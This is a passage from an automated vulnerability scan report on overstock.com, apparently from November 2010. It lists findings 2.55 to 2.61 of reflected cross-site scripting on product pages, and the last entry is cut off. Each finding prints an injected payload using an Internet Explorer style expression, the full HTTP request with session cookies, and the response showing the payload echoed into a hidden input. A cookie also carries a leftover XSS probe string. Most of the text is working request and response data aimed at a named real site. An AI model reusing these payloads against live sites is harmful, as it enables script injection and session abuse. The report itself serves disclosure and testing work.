The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8bd"style%3d"x%3aexpression(alert(1))"da8c638786b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f8bd"style="x:expression(alert(1))"da8c638786b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Double-Breasted-Wool-Blend-Peacoat-with-Scarf/5109988/product.html?5f8bd"style%3d"x%3aexpression(alert(1))"da8c638786b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:34 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:34 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:34 GMT; Path=/
Set-Cookie: mxcproclicks=5109988|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:34 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404774126:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=7
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111257

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>MI
...[SNIP]...
<input type="hidden" name="5f8bd"style="x:expression(alert(1))"da8c638786b" value="1"/>
...[SNIP]...

2.55. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Wool-Blend-Overcoat/5110032/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Wool-Blend-Overcoat/5110032/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1c8"style%3d"x%3aexpression(alert(1))"f71bfc3a0e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a1c8"style="x:expression(alert(1))"f71bfc3a0e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Wool-Blend-Overcoat/5110032/product.html?4a1c8"style%3d"x%3aexpression(alert(1))"f71bfc3a0e6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:58 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:58 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:58 GMT; Path=/
Set-Cookie: mxcproclicks=5110032|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:58 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404798301:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111440

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>MI
...[SNIP]...
<input type="hidden" name="4a1c8"style="x:expression(alert(1))"f71bfc3a0e6" value="1"/>
...[SNIP]...

2.56. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-Womens-3-4-Faux-Fur-Polyfill-Jacket/4870176/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MICHAEL-Michael-Kors-Womens-3-4-Faux-Fur-Polyfill-Jacket/4870176/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae12"style%3d"x%3aexpression(alert(1))"5a68717ae1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cae12"style="x:expression(alert(1))"5a68717ae1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MICHAEL-Michael-Kors-Womens-3-4-Faux-Fur-Polyfill-Jacket/4870176/product.html?cae12"style%3d"x%3aexpression(alert(1))"5a68717ae1c=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:14 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:14 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408114741:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4870176|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:14 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:14 GMT; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 118290

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>MI
...[SNIP]...
<input type="hidden" name="cae12"style="x:expression(alert(1))"5a68717ae1c" value="1"/>
...[SNIP]...

2.57. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-Womens-Down-Faux-fur-Trimmed-Coat/4863020/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MICHAEL-Michael-Kors-Womens-Down-Faux-fur-Trimmed-Coat/4863020/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d217"style%3d"x%3aexpression(alert(1))"f287cfbe090 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d217"style="x:expression(alert(1))"f287cfbe090 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MICHAEL-Michael-Kors-Womens-Down-Faux-fur-Trimmed-Coat/4863020/product.html?9d217"style%3d"x%3aexpression(alert(1))"f287cfbe090=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:11 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:11 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408111421:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:11 GMT; Path=/
Set-Cookie: mxcproclicks=4863020|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:11 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=49
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>MI
...[SNIP]...
<input type="hidden" name="9d217"style="x:expression(alert(1))"f287cfbe090" value="1"/>
...[SNIP]...

2.58. http://www.overstock.com/Clothing-Shoes/Massimo-Genni-Black-Label-Mens-Navy-Stripe-2-button-Wool-Suit/4747448/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Massimo-Genni-Black-Label-Mens-Navy-Stripe-2-button-Wool-Suit/4747448/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bd67"style%3d"x%3aexpression(alert(1))"682ca66b68a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bd67"style="x:expression(alert(1))"682ca66b68a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Massimo-Genni-Black-Label-Mens-Navy-Stripe-2-button-Wool-Suit/4747448/product.html?3bd67"style%3d"x%3aexpression(alert(1))"682ca66b68a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:17 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:17 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4747448|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:17 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408117637:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:17 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112794

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Ma
...[SNIP]...
<input type="hidden" name="3bd67"style="x:expression(alert(1))"682ca66b68a" value="1"/>
...[SNIP]...

2.59. http://www.overstock.com/Clothing-Shoes/Milano-Mens-Hipster-Wallet/4097263/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Milano-Mens-Hipster-Wallet/4097263/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19d61"style%3d"x%3aexpression(alert(1))"71b1037c527 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19d61"style="x:expression(alert(1))"71b1037c527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Milano-Mens-Hipster-Wallet/4097263/product.html?19d61"style%3d"x%3aexpression(alert(1))"71b1037c527=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:00:31 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:00:31 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404831921:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4097263|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:00:31 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:00:31 GMT; Path=/
Keep-Alive: timeout=5, max=60
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110588

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Mi
...[SNIP]...
<input type="hidden" name="19d61"style="x:expression(alert(1))"71b1037c527" value="1"/>
...[SNIP]...

2.60. http://www.overstock.com/Clothing-Shoes/Miss-Sixty-Womens-Double-breasted-Peacoat/4862946/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Miss-Sixty-Womens-Double-breasted-Peacoat/4862946/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e0f"style%3d"x%3aexpression(alert(1))"5456ad3f7ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67e0f"style="x:expression(alert(1))"5456ad3f7ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Miss-Sixty-Womens-Double-breasted-Peacoat/4862946/product.html?67e0f"style%3d"x%3aexpression(alert(1))"5456ad3f7ca=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:50:11 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:50:11 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:11 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4862946|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:11 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404211768:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=41
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 115618

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Mi
...[SNIP]...
<input type="hidden" name="67e0f"style="x:expression(alert(1))"5456ad3f7ca" value="1"/>
...[SNIP]...

2.61. http://www.overstock.com/Clothing-Shoes/Pawz-by-bearpaw-Womens-Paradise-12-inch-Classic-Boots/4422101/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Pawz-by-bearpaw-Womens-Paradise-12-inch-Classic-Boots/4422101/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eac5"style%3d"x%3aexpression(alert(1))"c658ba364b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5eac5"style="x:expression(alert(1))"c658ba364b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Pawz-by-bearpaw-Womens-Paradise-12-inch-Classic-Boots/4422101/product.html?5eac5"style%3d"x%3aexpression(alert(1))"c658ba364b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
